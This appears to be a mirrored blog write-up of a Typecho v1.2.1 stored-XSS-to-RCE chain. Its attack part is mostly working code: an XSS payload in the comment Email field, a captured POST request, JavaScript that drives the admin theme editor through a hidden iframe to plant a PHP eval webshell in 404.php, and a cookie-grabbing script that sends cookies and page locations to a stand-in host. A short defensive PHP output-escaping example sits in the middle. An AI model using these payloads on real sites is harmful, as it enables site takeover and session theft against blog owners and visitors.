
Typecho v1.2.1 RCE

 1 year ago
source link: https://5ime.cn/typecho-xss2rce.html

Like the PHPStudy RCE from a while back, this is a 1-click exploit: RCE achieved through a stored XSS.

Today I noticed a new issue on the Typecho GitHub repository: There's still an XSS vulnerability in v1.2.1-rc

The vulnerability exists because the fix for the Typecho 1.2.0 XSS was incomplete. The payload given in the issue is shown below (the injection point is the Email field, whereas in 1.2.0 it was the URL field):

"></a><script>alert('hacked')</script>"@example.com

Capture the comment request and send it directly:

POST /index.php/archives/1/comment HTTP/1.1
Host: ty.la
Content-Length: 153
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://ty.la
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://ty.la/index.php/archives/1/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

author=%E6%B5%8B%E8%AF%95&mail="></a><script>alert('hacked')</script>"@example.com&url=&text=%E6%B5%8B%E8%AF%95&_=b04942bb37418474b1680405acf18a79
"></a><script/src=http://url/1.js></script>"@example.com

The contents of the JS file are as follows; the script comes from https://github.com/typecho/typecho/issues/1545. It works by defining a hidden iframe that drives Typecho's built-in "Edit current theme" feature to perform the file write.

function step1() {
    var data2 = '<iframe id="testxss" src="/admin/theme-editor.php?theme=default&file=404.php" width="0%" height="0%" onload="poc()"></iframe>';
    var oldata = document.body.innerHTML;
    document.body.innerHTML = oldata + data2;
}

var times = 0;
var g_shell = 0;
function poc() {
    if (times <= 10) {
        var htmldata = document.getElementById("testxss").contentWindow.document.getElementById("content");
        var btn = document.getElementById("testxss").contentWindow.document.getElementsByTagName("button");
        var olddatas = htmldata.innerText;
        htmldata.innerText = "<?php @eval($_POST[cmd])?>\n" + olddatas;
        btn[1].click();
        times += 1;
        if (g_shell == 1) {
            var xhr1 = new XMLHttpRequest();
            xhr1.open("get", "/usr/themes/default/404.php?shell=1");
            xhr1.send();
        } else {
            return 0;
        }
    }
}

step1();

Visiting the file confirms that the one-line webshell has been written into 404.php.
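The root cause is that the comment's email value reaches the page as raw HTML. The following is an added example (not Typecho's own code) of rendering that value with context-appropriate output encoding; it assumes a `$comment` array holding the submitted `author` and `mail` fields, and shows why syntactic email validation alone is not enough, since a quoted local part like the one in this payload is RFC-legal and typically passes `filter_var`.

```php
<?php
// Added example, not Typecho code. Assumes $comment = ['author' => ..., 'mail' => ...]
// as stored from the comment form.

function esc(string $s): string
{
    // Encode for an HTML text node or double-quoted attribute.
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

function render_comment_author(array $comment): string
{
    $author = esc($comment['author'] ?? '');
    $mail   = trim($comment['mail'] ?? '');

    // Syntactic check first. Note: a quoted local part such as
    // "..."@example.com is valid under RFC 5322, so this check alone
    // does not keep markup out of the stored value.
    if ($mail === '' || filter_var($mail, FILTER_VALIDATE_EMAIL) === false) {
        return '<span class="author">' . $author . '</span>';
    }

    // Escape at output: every " < > ' & in the address becomes an entity,
    // so the attribute cannot be broken out of and no tag is created.
    return '<a class="author" href="mailto:' . esc($mail) . '">' . $author . '</a>';
}

// Constructed input mirroring the shape of the payload from the issue.
$demo = [
    'author' => 'test',
    'mail'   => '"></a><script>alert(\'hacked\')</script>"@example.com',
];

echo render_comment_author($demo), PHP_EOL;
```

The emitted anchor contains only entity-encoded text inside the `href` attribute, so the browser never sees a `</a>` or `<script>` tag.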


Cookie-grabbing script:

var website="http://xss.xxx.com";
(function(){(new Image()).src=website+'/?keepsession=1&location='+escape((function(){try{return document.location.href}catch(e){return''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return''}})())+'&opener='+escape((function(){try{return(window.opener&&window.opener.location.href)?window.opener.location.href:''}catch(e){return''}})());})();
